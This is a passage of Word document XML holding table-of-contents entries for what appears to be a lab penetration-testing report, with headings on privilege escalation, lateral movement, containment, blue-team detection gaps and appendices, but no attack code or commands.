              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234776729" w:history="1">
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exploit B — Privilege Escalation and Credential Harvest (VM-2 → domain)</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc234776729 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7ADAA3D6" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234776730" w:history="1">
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exploit C — Lateral Movement and Sensitive-Data Access (VM-1 / VM-3)</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc234776730 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="30CC4F2A" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234776731" w:history="1">
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5 Tools and Techniques</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc234776731 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2905D301" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234776732" w:history="1">
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6 Operational Execution, Stealth and Evidence</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc234776732 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5F7C918C" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234776733" w:history="1">
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.7 Containment and Safety</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc234776733 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="48E88CF0" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234776734" w:history="1">
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.8 Technical Report — Detection Gap Analysis (Blue Team)</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc234776734 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1C73AE4E" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234776735" w:history="1">
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.9 Executive Brief for the Board</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc234776735 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1CF29505" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234776736" w:history="1">
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4 · Conclusion</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc234776736 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="214B9A83" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234776737" w:history="1">
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5 · References</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc234776737 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6C73682E" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234776738" w:history="1">
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6 · Appendices</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc234776738 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2270AFB0" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234776739" w:history="1">
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix A — OSINT and Timeline Source Notes (Task 1)</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc234776739 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5810B9E5" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234776740" w:history="1">
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix B — Lab Artefact Checklist (Task 2)</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
